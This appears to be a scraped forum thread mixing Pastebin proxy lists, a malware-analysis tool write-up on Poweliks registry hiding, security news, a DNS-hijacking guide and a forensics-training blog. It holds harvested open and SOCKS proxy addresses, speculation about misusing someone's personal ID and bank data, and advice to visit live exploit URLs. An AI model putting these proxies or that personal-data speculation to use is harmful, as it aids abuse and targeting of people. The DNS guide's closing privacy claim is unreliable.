66.193.69.30:8080 67.148.11.168:443 67.207.166.174:7808 67.207.166.174:8089 69.10.137.139:8000 69.163.47.19:8118 69.197.148.18:8089 69.64.49.7:3128 70.99.146.246:7004 74.207.242.38:3128 75.133.69.131:8080 77.236.152.177:13076 77.236.155.170:13076 77.236.156.77:13076 77.236.157.70:13076 77.245.171.70:3128 77.247.33.142:13076 77.75.88.200:8080 77.89.244.62:80 78.130.201.110:8080 79.106.108.139:8080 79.143.181.127:3128 80.64.81.34:3128 81.138.80.9:8080 81.20.145.100:3128 82.166.34.48:8085 82.208.136.106:3128 82.223.148.124:10150 82.223.148.124:10732 83.222.221.137:8080 83.241.46.175:8080 85.202.7.27:8080 85.217.255.155:8080 85.234.20.131:3128 85.236.25.20:9090 85.236.25.21:9090 85.236.25.22:9090 85.29.51.15:3128 86.51.186.34:3128 87.252.230.142:80 88.132.82.236:8088 88.159.116.151:80 88.198.24.108:3128 89.180.94.61:9064 89.181.63.116:9064 89.232.139.253:80 89.46.101.122:7808 89.46.101.122:8089 91.121.192.178:3128 91.121.52.75:8118 91.135.22.26:8080 92.114.141.239:3128 93.115.10.11:8080 93.116.49.221:8080 93.123.39.112:9064 93.81.252.75:8080 94.140.213.234:3128 94.142.109.193:10180 94.191.24.54:13076 94.203.226.50:80 94.247.174.121:18080 94.247.174.124:18080 94.247.174.125:18080 95.69.54.35:9064 [/LIST] Sursa: 09-12-14 | Fast Proxy Server List (3678) - Pastebin.com
-
09-12-14 | VIP Socks 5 Servers (41) Checked & filtered premium servers 101.176.109.233:49679 107.171.227.132:27345 124.160.35.2:808 173.48.85.6:47464 173.74.93.133:48641 174.1.13.143:50115 180.153.139.246:8888 198.27.67.24:53092 199.201.121.162:443 199.91.228.197:42149 207.190.107.166:37686 217.133.47.124:18280 217.172.179.88:13729 24.200.180.120:25389 42.51.152.102:9050 47.22.36.178:25802 58.165.230.93:34690 61.147.67.2:9125 62.201.214.203:3128 64.147.215.108:2777 69.113.219.131:26587 69.253.214.65:22130 70.183.2.100:46743 71.117.166.239:36644 71.177.42.105:41630 71.183.79.46:38565 72.133.32.186:46161 72.93.108.40:40722 73.55.188.147:34498 76.104.153.62:54598 78.39.178.2:443 79.180.131.50:5120 81.0.240.113:9050 82.194.76.183:10080 83.143.27.42:443 87.106.48.142:10080 88.178.116.157:60871 91.246.235.157:16122 96.33.210.159:23739 96.42.246.8:31949 98.193.56.63:42666 Sursa: 09-12-14 | VIP Socks 5 Servers (41) - Pastebin.com
-
09-12-14 | Free Scrapebox Google Passed HTTP Proxies (109) Checked & filtered (Timeout 45) 198.27.120.118:8082 5.149.36.1:3128 189.104.162.98:80 189.70.180.159:8080 41.129.74.215:8080 177.23.151.146:8080 141.255.161.24:3128 87.252.246.22:3128 187.5.122.231:8080 194.190.110.222:3128 190.201.75.225:3128 106.187.92.124:80 219.92.6.245:3128 183.89.40.48:3128 201.79.63.143:8080 2.49.99.108:8000 80.58.29.164:80 123.255.249.194:8081 202.29.240.161:8080 186.222.100.54:3128 180.183.67.20:3128 183.89.43.231:3128 110.77.205.130:3128 176.9.216.184:80 200.11.216.67:8080 198.27.115.66:8080 180.183.86.3:80 41.205.107.213:8080 14.139.120.124:8080 118.99.126.149:8080 87.236.211.37:3128 110.139.11.59:80 201.65.24.245:3128 174.129.103.50:80 61.8.77.74:3128 71.12.182.106:3128 209.222.151.21:3128 190.236.191.84:8080 23.22.233.36:3128 42.121.17.194:80 110.136.191.216:3128 42.121.18.43:8082 80.94.112.132:8080 205.213.195.80:8080 198.27.114.173:3128 49.212.149.114:8090 37.251.64.213:80 46.209.63.37:3128 41.42.205.214:8080 94.31.68.174:80 41.205.107.213:80 195.138.68.191:8085 78.46.63.51:8084 180.94.88.58:8080 5.152.193.142:8081 210.101.131.231:8080 41.129.3.67:8080 54.247.167.164:8088 89.233.104.79:8081 190.73.138.126:8080 186.207.70.52:3128 201.248.231.183:8080 2.51.1.193:8118 118.99.75.22:8080 190.233.121.110:8080 180.94.88.58:80 186.94.82.195:8080 61.8.75.211:8080 210.64.12.2:80 202.137.26.102:3128 88.248.13.15:8086 180.183.237.240:3128 201.18.4.213:8080 183.89.41.120:3128 175.103.44.92:80 176.31.165.26:3128 180.211.95.190:80 2.51.220.218:8118 180.247.133.241:80 190.75.175.197:8080 180.246.242.133:8080 180.253.62.21:80 201.79.204.208:80 46.211.74.226:54321 180.183.62.201:3128 190.207.128.197:8080 121.15.164.123:8088 183.89.68.208:3128 186.160.17.87:8000 200.181.125.43:3128 190.90.199.130:8080 222.124.35.116:8080 183.89.80.114:3128 49.128.176.178:3128 119.42.80.11:8080 41.45.252.67:80 190.42.202.109:8080 5.9.236.123:443 118.97.212.162:8080 180.183.11.216:3128 203.223.47.215:3128 177.35.37.94:8080 186.93.98.204:8118 180.183.207.183:3128 183.89.85.100:3128 41.236.173.11:3128 121.96.166.72:3128 41.204.250.62:8080 195.175.83.146:3129 Sursa: 09-12-14 | Free Scrapebox Google Passed HTTP Proxies (109) - Pastebin.com
-
Java Bytecode Reverse Engineering
Nytro replied to Aerosol's topic in Reverse engineering & exploit development
Super. Un tutorial mai detaliat legat doar de java bytecode / ASM stie cineva? -
Cere sa iti dea PM cine are nevoie. O sa iti manance timp sa le raspunzi, dar macar stii cine e retardatul.
-
Registry Dumper – Find and Dump Hidden Registry Keys Posted on December 6, 2014 by darryl The cybercriminals behind Poweliks implemented two clever techniques in their malware. The first was leveraging rundll32.dll to execute Javascript and the second was using a method to hide/protect their registry keys. I’ll be focusing on the second method. The technique of hiding/protecting registry keys using a non-ASCII character goes all the way back to over a decade ago. It’s remarkable in a sense that after all these years, it still works on the latest Windows platform. Here we see the built-in Windows Registry Editor choke on the hidden/protected key after infecting the computer with Poweliks. Clicking past the error dialog, you should see something like this. This default key is exposed and fully downloadable/viewable. However, there’s another key that contains the “trigger” that’s not visible. If we need to research what this particular malware is doing, we ought to find out what else is hiding there. For that we need to find a tool to help us view these hidden registry keys. With online registry viewers/editors, you can get mixed results. Some seem to work well but lack some basic functionality like exporting keys as text. Others get confused and display the wrong key. Offline registry viewers/editors fare much better and offer consistent results. However, you will need to log into a separate account on the computer and use this tool. Or you have to copy the registry off of the infected machine and view it on a computer with the tool installed. I prefer to do an initial triage on the live machine and get to the data as quickly as possible. Since I couldn’t find a portable, online tool that had the features I wanted, I figure I would try my hand at creating one. The tool is called Registry Dumper and uses a DLL which interacts with the registry via NT native APIs that was written by Hoang Khanh Nguyen. This tool allows you to scan for null characters in a given path. It will iterate through the path to find all the keys with nulls in them. If you click on the “Show in Hex” checkbox, you can see the key names in hex. Here you will notice that the second entry’s name is “010001” which is equivalent to 0x01 0x00 0x01. This is impossible to view, edit, or delete using the Windows’ Registry Editor. From here you can copy/paste the path over to the left side and dump the keys to a text file. Here’s the text file containing all the key values in the given path. With this tool you can create hidden keys for testing purposes. And if you wanted to delete that impossible-to-remove key, you can use this tool by entering “[x01][null][x01]” as the key name. The obfuscated data you see there is the result of running it through Microsoft Script Encoder. To deobfuscate it, you can use an online decoder or download a VBS decoder. A fellow by the name of Lewis E. Moten III wrote a decoder program. I repackaged his function in the following tool. Here is the decoded version. You will notice that I didn’t have to strip away everything else but the encoded string. The decoder program will look for the start and end markers of the encoded text and replace it with the decoded result. Just recently, a newer variant of Poweliks was found. It uses a different registry hiding technique based on user permissions. You can read about it here. If you use this tool to access one of these keys, you will get an error message saying that the key doesn’t exist. It does exist but it’s just that it doesn’t have the rights to view it. Here’s the permission properties of the key using the Windows Registry Editor. Notice that the current user has no read permissions. You can still use this tool to dump the keys but you first need to grant permission to the user account that’s running the tool. Just click on the Set Permission to User button and the permission is changed to allow the current user the rights. Now you can access the key: Here is the dump of the keys: And the decoded string: By the way, that Javascript in the “(Default)” key can be deobfuscated easily using Converter. You will see that the value in between the quotes are shifted over by one character (e.g. the word hello = ifmmp). Just enter the value “-1? and click on the SHIFTx button (or you can click once on the minus button on the right). You can download both tools here. Sursa: Registry Dumper – Find and Dump Hidden Registry Keys | Kahu Security
-
US lawmaker pushes back against FBI backdoor calls David Meyer Dec. 5, 2014 - 12:58 AM PST U.S. Senator Ron Wyden (D-OR) has introduced a bill that would stymie almost any attempt by a government agency to force device manufacturers and app developers to install backdoors for surveillance purposes. Wyden’s Secure Data Act, introduced on Thursday, follows calls by FBI chief James Comey for companies such as Apple and Google to give his agents a way through their encryption mechanisms, which have been tightened in the wake of Edward Snowden’s NSA revelations and episodes such as the celebrity iCloud hack. Apple’s most recent move, for example, makes it impossible for the company to bypass the passcode on a user’s iPhone for the benefit of law enforcement or intelligence agencies. Wyden’s bill gives an exemption to CALEA, the U.S. law that already compels carriers and router manufacturers to install “lawful intercept” capabilities, but beyond that it states: … no agency may mandate that a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency. “Covered products” means any hardware or software made available to the general public, so the bill would arguably not cover, say, flawed random number generators. Wyden’s main impetus for this move, the NSA critic said in a statement, was that backdoors inherently weaken the security of the systems they’re installed in. He also reckons that backdoor mandates are a disincentive to innovation in “strong new data security technologies”, and harmful to trust in American products and services. “Strong encryption and sound computer security is the best way to keep Americans’ data safe from hackers and foreign threats,” he said in the statement. “It is the best way to protect our constitutional rights at a time when a person’s whole life can often be found on his or her smartphone. And strong computer security can rebuild consumer trust that has been shaken by years of misstatements by intelligence agencies about mass surveillance of Americans.” It’s interesting, if unsurprising, that Wyden’s bill gives a get-out to CALEA. His own statement cites the 2005 case of senior Greek politicians being illicitly tapped, using an Ericsson lawful intercept feature, as an example of how backdoors can compromise a system’s security for the benefit of more people than they’re supposed to. Earlier this year, security researchers also identified critical weaknesses in some companies’ lawful intercept products. Sursa: https://gigaom.com/2014/12/05/us-lawmaker-pushes-back-against-fbi-backdoor-calls/
-
Kaspersky: That 2 years we took to warn you about Regin ? We had GOOD REASON Security community: We only saw fragments... By John Leyden, 5 Dec 2014 Kaspersky Lab has responded to criticism that security vendors took years too long to spot Regin, a recently discovered strain of ultra-sophisticated (and probably state-sponsored) spyware. Regin is a software framework rather than an individual malicious code sample. Security vendors have until recently only seen fragments of the whole, making analysis difficult. Kaspersky Lab explained the two-year delay in releasing info about the Regin cyberweapon by comparing its work to an investigation by police. Security research - not unlike law enforcement investigations - requires meticulous scrutiny and analysis, and in many cases, it's important to watch the crime unfold in real-time to build a proper case. In our case, without unlimited resources and the fact that we're tracking multiple APT actors simultaneously (Careto/Mask, EpicTurla, Darkhotel, Miniduke/Cosmicduke, to name a few), this becomes a process that takes months, even years, to gain a full understanding of a cyber-operation. Sean Sullivan from F-Secure compares APT research to the work of paleontologists that find some bones of a dinosaur. Everyone may have a bone, but nobody has the full skeleton. Kaspersky picks up this analogy and runs with it. "In the case of Regin, what we first discovered in 2012 was a slightly damaged bone from unknown part of a monster living in a mysterious mountain lake," the firm said in a blog post on its official Securelist blog. The Russian security firm goes on to firmly deny withholding information about and detections of Regin at the request of governments, customers or anyone else. Security firm Symantec was the first to publish research about Regin around two weeks ago. The cyber espionage tool has been used for the past six years to spy on business and private targets. As previously reported, Symantec has previously come out swinging at accusations it was tardy in releasing information about Regin. Neither Kaspersky's or Symantec's denials are likely to silence either conspiracy theorists or anti-virus naysayers, of course. It's only possible to note that the offenders have a big advantage over defenders in cyber-espionage operations, and huge resources at their disposal, so the length of time taken to detect Regin is poor evidence of complicity between security software firms and cyber-spies. There are precedents for the delay in releasing information about Regin, as Kaspersky Lab points out. Like Regin, sometimes we find that we had been detecting pieces of malware for several years before realizing that it was a part of global cyber-espionage campaign. One good example is the story of RedOctober. We had been detecting components of RedOctober long before we figured out that it was being used in targeted attacks against diplomatic, governmental and scientific research organisations. Regin is most likely the work of an advanced nation state using multiple levels of encryption to obfuscate itself and other trickery in order to avoid detection, say securobods. Advanced functionality in Regin includes the ability to directly monitor mobile phone traffic, with Symantec reporting that 28 per cent of the samples seen attacked telecoms backbone infrastructure. Once installed into a computer, Regin can carry out a variety of malign actions – including capturing screenshots, monitor keystrokes, steal passwords and even recovering deleted files. ISPs, energy companies, airlines and research-and-development labs are among its victims. What really marks the Regin platform out as something special is its ability to attack GSM and take over the management functions of mobile networks. The attackers were able to obtain credentials that would allow them to control GSM cells in the network of a large cellular operator, according to Kaspersky Lab. This gave attackers the access to information about which calls are processed by a particular cell, along with the ability to redirect these calls to other cells, activate neighbour cells and perform other offensive actions. Samples of Regin were injected into systems at Belgian telecoms outfit Belgacom around 2010, and builds of the spyware has been circulating for at least six years. Security firm G Data said it was aware of attacks on targets in 18 countries, including Germany, Russia, Syria and India. The Belgacom link is evidence that GCHQ might have had a hand in its creation but this is a bit circumstantial and who created Regin remains something of a mystery. This and the fact that the modules are called LEGSPIN could be a diversionary tactic. What is curious is that none of the “Five Eyes” countries (Australia, Canada, New Zealand, the UK, and the United States) make an appearance in the list of victims. ® Sursa: Kaspersky: That 2 years we took to warn you about Regin ? We had GOOD REASON • The Register
-
In timpul tau liber, sau ca parte din job?
-
Good guy spam, poze cu gagici
-
E mai mult o curiozitate de-a mea. Sa presupunem ca ai datele publice: 1. Numele complet 2. Cod numeric personal 3. Serie si numar buletin 4. Adresa de acasa 5. Adresa de mail 6. Adresa IP 7. Cont IBAN 8. Cont Paypal Ce poti pati in cazul in care cineva are aceste date si iti vrea raul? Raspundeti punctual: 1. Gaseste Facebook si poate alte informatii 2. Cere informatii despre cont in banca 3. Inchide abonamentul de telefonie 4. Vine la tine si se caca la usa 5. Gaseste informatii despre tine: conturi, interese 6. Afla zona in care stai, cauta loguri ale accesarilor 7. Afla banca la care ai cont 8. Afla numele tau trimitand 1 euro (cred) Sunt doar cateva opinii. Voi ce parere aveti?
-
How to Stop DNS Hijacking You have (probably more than once in your life) keyed in a familiar domain name and ended up in an entirely different page that was not even close to what you had expected. Chances are that you never even noticed the abnormality and you went ahead retyping the domain name or making a custom search of your preferred destination on Google. Well, what you have never realized is that you may have been a victim of Domain Name System Hijacking or redirection. Apparently, DNS hijacking is a growing threat, and no single organization is large enough for DNS attacks. Not long ago, a hackers’ group known as the Iranian Cyber army took Twitter by storm, after having successfully managed to redirect domain requests from Twitter.com to its own hosted IP addresses. Similarly, on Thanksgiving day, the Syrian Electronic Army hijacked network traffic to major media outlets sites including the Independent , the Telegraph and the Canadian Broadcasting Corporation, just to mention a few. So, What is DNS Hijacking? Technically, Domain Name System Hijacking intercepts legitimate DNS requests from the user and matches them to compromised IP addresses hosted on the attacker’s servers. Ideally, websites on the World Wide Web are identified using a combination of numbers known as IP addresses, which are unique to every single site. To save you from the hassle of having to remember each IP address like you do with all your passwords, all IP addresses are given a custom domain name, which is easy to remember. In simple terms, you can access the web by searching its domain name or through its IP address if you can recall it, although you won’t. When it comes to DNS hijacking, the attacker launches a man-in-the-middle-like attack, which subverts the user’s DNS requests and directs them to their own compromised DNS server. The basic function of a DNS server is to match the user’s DNS request with the correct IP addresses. However, an attackers’ compromised DNS server uses a DNS switching Trojan to attach the wrong IP address to the user’s DNS request, therefore directing him to a spoofed website. Such attacks are known as Pharming and could be employed by scammers in a phishing campaign aimed at stealing personal information. Notably, DNS hijacking is not a pattern of malicious hackers only. Legitimate ISP providers also engage in the ill-feting activity to suit their own selfish interests, including placing ads or collecting statistics for Big Data Analysis. Ordinarily, you should come up with a “server not found” error message every time you query a non-existent domain name. However, ISP providers have perfected the art of manipulating DNS (NXDOIMAN) responses and directing users to their ad-ridden IP addresses. DNS Hijacking is not only irritating, but could also expose the user to potentially dangerous cross-site scripting attacks, besides violating RFC international standard for DNS (NXDOMAIN) responses. A fine example of an ISP “behaving badly” and somehow manipulating Internet users without their consent (otherwise, it would not be manipulation, right?) is that of Verizon and its Perma Cookie. EFF has heavily criticized the abuse of personal information that has been made by Verizon Wireless, and this is just a drop in the ocean of non-consensual traffic redirection and tracking occurring daily on the web. Shore Up DNS Security Whether it’s a DNS cache poisoning or simple DNS blocking by the ISP providers, no one wants to traverse the web at gun point. In a Cache Poisoning attack, the hacker secretly injects false addressing data into DNS resolvers, enabling the attackers to redirect legitimate DNS requests away from legitimate websites to compromised DNS servers. The clandestine activity can go undetected for ages, allowing the attack to siphon huge chunks of sensitive information, including all Passwords and Usernames. The first step in fortifying your DNS security is to deploy Domain Name System Security Extensions (DNSSEC). This is a security standard that allows the Domain owners to physically monitor traffic to their domain. The owners are able to register their Domains’ zones, enabling DNS resolvers to verify the authenticity of all DNS responses. Anyone with .org domains can now register them to domain registers through companies such as GoDaddy. DNSSEC will also enable you to manage customer identities. Configure Your DNS Settings In reality, the solution to your DNS solution lies within. If your ISP provider’s DNS server does not live up to its security expectations, ditch that for an alternative third party DNS, such as OpenDNS, NortonDNS or DNSResolvers. Here is how to configure your DNS settings of your operating system and prevent DNS hijacking: For Windows Users: Open the control panel. Under “Network and Internet” click on “Network status and tasks” and proceed to the Wireless connection button on the far right of your window. Under the “Wireless Network Connection Status”, click on “Properties” and go ahead to select “Internet Protocol Version 4 (TCP/IPv4) properties.” Now you should be able to give an alternative DNS address of your choice. Almost at the bottom of the dialog box, select the “Use the following DNS server addresses” button and fill out your alternate DNS server IP information (e.g. 8.8.8.8 for Google or 205.210.42.205 for DNSResolvers). Click OK and your alternate DNS will now be active by default. For Ubuntu Users: On the system menu, click on “Network connections” and select “Preferences”. Now you’re at a dialog box with three optional tabs. If you want to configure the Ethernet connection, click on the “Wired” button and then specify your network from the interface list. For a wireless connection, click on the “Wireless connection” button and select your network. Then click on the “Edit” button. Select the IPv4 Settings tab and, if the Automatic (DHCP) is the selected method, then proceed to select “Automatic (DHCP) addresses only”. In the Dialog box that appears, key in your DNS IP information (e.g. for Google type 8.8.8.8 8.8.4.4 and then follow up with the changes). You may be required to set a password of your choice. Repeat the above steps for any network you wish to modify. After having followed the guidelines provided above in order to amend your settings, you will see that the alternative DNS servers you use work wonders for your privacy. Without having the proper information displayed on your computer for anyone to track down on, DNS hijacking cannot happen. Instead, your wireless connection will be completed using fake details, and therefore you will be thoroughly protected at all times while surfing the web! By Ali Qamar|December 5th, 2014 Sursa: How to Stop DNS Hijacking - InfoSec Institute
-
[h=2]Improving Your Malware Forensics Skills[/h]ednesday, June 25, 2014 Posted by Corey Harrell By failing to prepare, you are preparing to fail. ~ Benjamin Franklin In many ways preparation is key to success. Look at any sporting event and the team who usually comes out on top are the ones who are better prepared. I'm not just referring to game day; I'm also talking about the coaching schemes and building a roster. Preparation is a significant factor to one's success in the Digital Forensic and Incident Response field. This applies to the entire field and not just malware forensics, which is the focus of this post. When you are confronted with a system potentially impacted with malware your ability to investigate the system successfully depends on your knowledge, experience, and toolset. This is where there is a conundrum. There is a tendency for people not to do malware cases (either through being hired or within an organization) due to a lack of knowledge and experience but people are unable to gain knowledge and experience without working malware cases. The solution is through careful preparation one can acquire knowledge, experience, and toolset that can eventual lead to working malware cases. This post outlines the process I used and currently use to improve my malware forensics skills. The process described in this post helped me to develop the skills I have today. I even use a similar process to create test systems to help develop malware forensic skills in others (if you read this blog then you have already seen the benefits of doing this). With that said, what I am describing is a very time consuming process. However, if you decide to replicate the path I took it will be worth it and along the way you'll improve your malware forensic skills. This post is specifically directed at those wanting to take this step using their own resources and time. Those wanting to lose themselves in the DFIR music. [h=2]Process, Process, Process[/h] Malware forensics is the process of examining a system to: find malicious code, determine how it got there, and what changes it caused on system. The first place to start for improving one's skills is by exploring the process one should use. The purpose of starting with the process is twofold. First and foremost it is to understand the techniques, examination steps, and knowing what to look for. The second reason is to explore the various tools to use to carry out the process. There are only a few resources available specific to this craft such as: Malware Forensics Field Guide for Windows Systems and Windows Forensic Analysis Toolkit, Fourth Edition. In addition, this has been an area on my radar to add one more book to the discussion but in the meantime my jIIr methodology page outlines my process and links to various posts. My suggestion is to first review the methodology I put together which is further explained in the posts: Overall DF Investigation Process and End to End Digital Investigation. Afterwards, review one or two of the books I mentioned. As you work your way through this material pay attention to the malware forensic process the author uses or references. When it is all said and done and you completed reviewing what you set out to then document a malware forensic process you want to use. If this sounds familiar then you either started reading jIIr from the beginning or you are one of my early followers. This is exactly what I described in my second and third posts Where to start? and Initial Examination Steps & First Challenge that I wrote almost four years ago. However, a lot of time has passed since I wrote those posts and I improved my process as outlined below: - Examine the master boot record - Obtain information about the operating system and its configuration - Examine the volatile data - Examine the files on the system that were identified in volatile data - Hash the files on the system - Examine the programs ran on the system - Examine the auto-start locations - Examine the host-based logs - Examine file system artifacts - Malware searches - Perform a timeline analysis - Examine web browsing history - Examine specific artifacts - Perform a keyword search - Examine suspected malicious files [h=3]Tools, Tools, Tools[/h] After the process you want to use is documented then the next step is to identify the tools you will use in each examination step. There are numerous tools you can use; the tools mentioned by the authors in the reference material, tools talked about the bloggers in my blog roll, or tools you already have experience with. To be honest, what tools someone should use depends. It really depends on what you prefer and are comfortable with. The tools I started out with are not the same ones I use today; the important thing is each tool helped me learn and grow. Pick any tools you want as a starting point and over time you will start to see the pros and cons of various tools. [h=2]Testing Environment[/h] With your process and tools selected, now it is finally time to stop the researching/documenting and to actually use the process you documented and tools you selected. To do this you first have to set up a testing environment. There is an inherit risk to using virtualization for the testing environment; the malware may be virtualization aware and behave differently than on real computer. However, despite this risk I highly recommend to use virtualization as your testing environment. It's a lot faster to create multiple test systems (by copying virtual machines) and the snapshot feature makes it easier to revert mistakes. There are various virtualization options available with great documentation such as VirtualBox and VMware. Pick a virtualization platform and install it using the provided instructions. [h=3]Creating your VMs[/h] Another decision you'll need to make is what operating systems to perform your testing on. This not only includes the operating system versions (i.e. Windows 7 vs Windows 8) but what processor to use as well (32 bit vs 64 bit). I ended up selecting VMware for the virtualization software and Windows 7 32 bit as the testing platform. You will need to create your first VM by installing the operating system of your choice. After the installation try to make things easier for the system to be compromised. First disabled security features. This includes the built-in firewall and the user account control. Next make sure the account you are using has administrative privileges. Next you will want to make your test system a very juicy target. To do this you'll need to install vulnerable client-side applications including: Adobe flash, Adobe Reader, Java, Silverlight, Microsoft Office, Internet Explorer, and a non-patched operating system. One place to grab these applications is Old Apps and to determine what versions to install pick the ones targeted by exploit kits. At a minimum, make sure you don't patch the OS and install Java, Silverlight, Adobe reader, and Adobe flash. This will make your VM a very juicy target. After the VM is created and configured then you'll want to make multiple copies of it. Using copies makes things easier during analysis without having to deal with snapshots. [h=2]Manually Infecting Systems[/h] The first approach to improving your skills is a manual method to help show the basics. The purpose is to familiarize yourself with the artifacts associated with malware executing in the operating system you picked. These artifacts are key to be successful in performing malware forensics on a compromise system. The manual method involves you infecting your test VM and then analyzing it to identify the artifacts. The manual method consists of two parts: using known and unknown samples. However, before proceeding there is very important configuration change. The virtual machine's network configuration needs to be isolated to prevent the malware from calling home or attacking other systems. [h=3]Using Known (to you) Samples[/h] Starting out it is better to practice with a sample that is known. By known I mean documented so that you can reference the documentation in order to help determine what the malware did. Again, we are trying to improve our ability to investigate a system potentially impacted with malware and not trying to reverse the malware. The documentation is just to help you account for what the malware did to make it easier to spot the other artifacts associated with the malware running in the operating system. The way to find known samples really depends. You could find them using information on antivirus websites since they list reports using their malware naming convention. For example, Symantec's Threat Listing, Symantec's Response blog, Microsoft's Threat Reports, or Microsoft's Malware Encyclopedia to name a few. These are only a few but there are a lot more out there; just look at antivirus websites. The key is to find malware with a specific name that you can search on such as Microsoft's Backdoor:Win32/Bergat.B. Once you find one you like then review the technical information to see the changes the malware makes. I suggested finding known malware by names first because there are more options to do this. A better route if you can find it is to use a hash of a known malware sample. Some websites share the hash of the sample they are discussing but this doesn't occur frequently. A few examples are: Contagio Malware Dump, KernelMode.info, or MxLab blog. Another option is to look at the public sandboxes for samples that people submitted such as Joe Sandbox or one listed on Lenny Zelster's automated malware analysis services list. After you pick a malware name or hash to use then the next step is to actually find the malware. Lenny Zelster has another great list outlining different malware sample sources for researchers. Anyone one of these could be used; it just needs the ability to search by detection name or hash. I had great success using: VirusShare, Open Malware, Contagio Malware Dump, and KernelMode.info. Remember the purpose of going through all of this is to improve your malware forensic skills and not your malware analysis skills. We are trying to find malware and determine how the infection happened; not reversing malware to determine its functionality. Now that you have your sample just infect your virtual machine (VM) with it and then power it down. If the VM has any snapshots then delete them to make it easier. Now that you have an infected image (i.e. the vmdk file) you can analyze it using the process you outlined and the tools you selected. At this point you are making sure the process and tools work for you. You are also looking to explore the artifacts created during the infection. You know the behavior of the known malware so don't focus on this. Malware is different and so will be their artifacts. Focus on the artifacts created by a program executing in the operating system you selected. Artifacts such as program execution, logs, and file system. [h=3]Using Unknown (to you) Samples[/h] Using a known sample is helpful to get your feet wet but it gets old pretty quick. After you used a few different known samples it is not as challenging to find the artifacts. This is where you take the next step by using an unknown (to you) sample. Just download a random sample from one of the sources listed at malware sample sources for researchers. Infect your virtual machine (VM) with it and then power it down. If the VM has any snapshots then delete them to make it easier. Now you can start your examination using the same process and tools you used with a known malware sample. This method makes it a little more challenging because you don't know what the malware did to the operating system. [h=2]Automatically Infecting Systems[/h] The manual method is an excellent way to explore the malware forensic process. It allows you to get familiar with an examination process, tools, and artifacts associated with an infection. One important aspect about performing malware forensics is to identify the initial infection vector which was used to compromise the system in the first place. The manual method infections always trace back to you executing malware samples so you need to use a different method. This method is automatically infecting systems to simulate how real infections appear. Before proceeding there is a very important configuration change. The virtual machine's network configuration needs to be connected to the Internet. This can be done through the NAT or bridged configuration but you will want to be in a controlled environment (aka not your company's production network). There are some risks with doing this so you will need to take that into consideration. Personally, I accept this risk since improving my skills to help protect organizations is worth the trade off. [h=3]Using Known Websites Serving Malware[/h] In the automatically infecting systems approach the first method is to use a known website serving malware. There are different ways to identify these websites. I typically start by referring to Scumware.org (FYI, site hates Internet Explorer), Malc0de database, and the Malware Domain List. In both instances I look for URLs that point to a malicious binary. Other sources you can use are the ones listed by Lenny Zelster on his Blocklists of Suspected Malicious IPs and URLs page. Again, you are trying to find a URL to a site hosting a malicious binary. Another, source you shouldn't overlook is your email SPAM/Junk folder. I have found some nice emails with either malicious attachments or malicious links. Lastly, if you pay attention to the current trends being used to spread malware then you can found malicious sites leveraging what you read and Google. This is a bit harder to pull off but it's worth it since you see a technique currently being used in attacks. Inside your VM open a web browser, enter in the URL you identified, and if necessary click any required buttons to execute the binary. Wait a minute or two for the malware to run and then power it down. If the VM has any snapshots then delete them to make it easier. Now you can start your examination using the same process and tools you used with the manual approach. The purpose is to find the malware, artifacts associated with the infection, and the initial infection vector. Infecting a VM in this manner simulates a social engineering attack where a user is tricked into infecting themselves. If a SPAM email was used then it simulates a email based attack. To see how beneficial this method is for creating test images to analyze you can check out my posts Examining IRS Notification Letter SPAM and Coming To A System Near You. The first post simulates a phishing email while the later simulates social engineering through Google image search. [h=3]Using Potentially Malicious Websites[/h] The second method in the automatically infecting systems approach is to use potentially malicious websites. This method tries to infect the VM through software vulnerabilities present in either the operating system or installed client-side applications. This is the most time consuming out of all of the methods I described in this post. It's pretty hard to infect a VM on purpose so you will end up going through numerous URLs before hitting one that works. This is where you may need to use the VM snapshot feature. To find potentially malicious URLs you can look at the Malware Domain List. Look for any URLs from the current or previous day that are described as exploit or exploit kit as shown below. You can ignore the older URLs since they are most likely no longer active. Another option I recently discovered but haven't tried yet is using information posted at Malware-Traffic-Analysis.net. The site doesn't obfuscate websites used so you may be able to use it to find active websites serving up exploits. The last option I'm sharing is the one I use the most; the URLs others are submitting to URLQuery.net. Just keep in mind, there are certain things that can't be unseen and there are some really screwed up people submitting stuff to URLQuery. When reviewing the submitted URLs you want to pay attention to those that have detections as shown below: After you see a URL with detections then you'll need to examine it closer by reviewing the URLQuery report. To save yourself time, focus on any URLs whose reports mention: malicious iframes, exploits, exploit kits, or names of exploit kits. These are the better candidates to infect your VM. The pictures below show what I am referring to. Before proceeding make sure your VM is powered on and you created a snapshot. The snapshot comes in handy when you want to start with a clean slate after visiting numerous URLs with no infection. An easy way to determine if an infection occurred is to monitor the program execution artifacts. One way I do this is by opening the C:\Windows\Prefetch folder with the items sorted by last modification time. If an infection occurs then prefetch files are modified which lets me know. Now you can open a web browser inside your VM, enter in the URL you identified, and monitor the program execution artifacts (i.e. prefetch files). If nothing happens then move on to the next URL. Continue going through URLs until one successfully exploits your VM. Upon infection wait a minute or two for the malware to run and then power it down. Make sure you delete any snapshots to make it easier. Now you can start your examination using the same process and tools you have been using. The purpose is to find the malware, artifacts associated with the infection, and the initial infection vector. The initial infection vector will be a bit of a challenge since your VM has various vulnerable programs. Infecting a VM in this manner simulates a drive-by which is a common attack vector used to load malware onto a system. To see how beneficial this method is for creating test images you can check out my post Mr Silverlight Drive-by Meet Volatility Timelines (FYI, I suspended the VM to capture the vmem file in addition instead to powering it down to get the disk image). [h=2]Summary[/h] Benjamin Franklin said "by failing to prepare, you are preparing to fail." To be successful when confronted with a system potentially impacted with malware we should be preparing for this moment now. Taking the time to improve our malware forensic skills including our process, tools, and knowledge of artifacts. Making the right preparations so when game day approaches we will come out on top. The process I use to improve my malware forensic skills and the one I described in this post is not for everyone. It takes time and a lot of work; I've spent countless days working through it. However, working your way through this process you will attain something that can't be bought with money. There is no book, training, college course, or workshop that can replicate or replace the skills, knowledge, and experience you gain through careful preparation by training yourself. Sursa: Journey Into Incident Response: Improving Your Malware Forensics Skills
-
